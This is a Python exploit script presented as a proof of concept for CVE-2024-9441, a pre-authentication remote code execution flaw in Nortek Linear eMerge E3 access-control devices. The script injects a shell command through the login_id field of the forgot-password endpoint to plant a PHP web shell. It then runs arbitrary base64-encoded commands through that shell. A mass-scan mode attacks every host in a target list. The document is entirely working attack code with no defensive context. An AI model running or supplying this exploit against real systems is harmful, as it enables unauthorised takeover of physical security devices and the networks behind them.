exploit.py

import argparse
import base64
import requests

# Function to exploit a single target
def exploit(target, port, cmd):
    url = f"https://{target}:{port}/index.php?c=user&m=forgot_password"
    
    # Payload to create malicious PHP file
    PAYLOAD = {'login_id': '`echo \'<?php exec(base64_decode($_POST["c"]),$output);echo(implode("\n",$output));?>\' > img/index.html`'}
    try:
        
        response = requests.post(url, data=PAYLOAD, verify=False, timeout=5)
        if response.status_code == 200:
            print("[+] Payload uploaded successfully.")
        else:
            print(f"[-] Failed to upload payload on {target}:{port}.")
            return
        
        
        cmd_encoded = base64.b64encode(cmd.encode()).decode()
        exec_url = f"https://{target}:{port}/img/index.html"
        exec_payload = {'c': cmd_encoded}
        response = requests.post(exec_url, data=exec_payload, verify=False, timeout=5)
        
        if response.status_code == 200:
            print(f"[+] Command executed on {target}:{port}:")
            print(response.text)
        else:
            print(f"[-] Exploit failed on {target}:{port}.")
    except Exception as e:
        print(f"[-] Error with {target}:{port}: {e}")

# Function to perform mass scanning using a list of targets
def mass_scan(targets_file, cmd):
    with open(targets_file, 'r') as file:
        for line in file:
            target, port = line.strip().split(':')
            exploit(target, port, cmd)


def main():
    parser = argparse.ArgumentParser(description="Nortek Linear eMerge E3 Pre-Auth RCE PoC (CVE-2024-9441)")
    
    
    parser.add_argument('--ip', help="Target IP address", type=str)
    parser.add_argument('--port', help="Target port", type=int, default=443)
    parser.add_argument('--cmd', help="Command to execute", type=str, default="/bin/ls -al /spider/web")
    
    
    parser.add_argument('--list', help="File containing list of targets (IP:port)", type=str)
    
    args = parser.parse_args()
    
    if args.list:
        
        mass_scan(args.list, args.cmd)
    elif args.ip:
        
        exploit(args.ip, args.port, args.cmd)
    else:
        print("[-] Please provide either a single target (--ip) or a list of targets (--list).")

if __name__ == "__main__":
    main()